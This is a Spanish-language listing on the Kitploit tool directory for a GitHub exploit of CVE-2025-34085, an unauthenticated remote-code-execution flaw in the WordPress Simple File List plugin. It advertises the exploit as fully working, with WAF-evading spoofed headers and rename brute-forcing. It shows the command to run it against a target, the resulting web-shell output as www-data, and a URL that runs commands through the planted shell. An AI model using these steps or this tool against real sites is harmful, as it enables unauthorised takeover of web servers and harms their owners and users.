Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-34085 — Simple File List – Exploit de RCE sin autenticación (CVE-2025-34085) | Kitploit
Herramientas/GitHubGitHub/mrjhaxcore/cve-2025-34085
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubmrjhaxcore/cve-2025-34085

CVE-2025-34085

Simple File List – Exploit de RCE sin autenticación (CVE-2025-34085)

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

📂 Simple File List – Exploit RCE no autenticado (CVE-2025-34085)

⚠️ Código de exploit por: Mrj Haxcore

Un exploit Python completamente funcional para el plugin Simple File List de WordPress (<= 4.2.3), el cual es vulnerable a ejecución remota de código no autenticada (RCE) debido a una lógica insegura de subida y renombrado de archivos.


💣 Resumen de la vulnerabilidad

  • Plugin: Simple File List (simple-file-list)
  • Versión: <= 4.2.3
  • CVE: CVE-2025-34085
  • Impacto: Los usuarios no autenticados pueden subir un archivo PHP disfrazado como .png, luego renombrarlo a .php y ejecutar código arbitrario.
  • Requisitos: Sin autenticación requerida
  • Tipo de exploit: Subida de archivo → Omisión de renombrado → Ejecución de comandos

✅ Características

  • 🚀 Cadena de exploit completamente automatizada
  • 📤 Constructor manual de multipart/form-data (evita el error 415)
  • 🔁 Fuerza bruta de renombrado para .php, .php5, .phtml, etc.
  • 🛡️ Cabeceras falsificadas realistas para eludir WAFs
  • 🐚 Ejecución de comandos a través de ?cmd=
  • 🧼 Salida limpia (sin basura �PNG)

🛠 Uso

root@kitploit:~
python3 simple.py https://target.site

[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Manual Visit

https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami
Descargar herramienta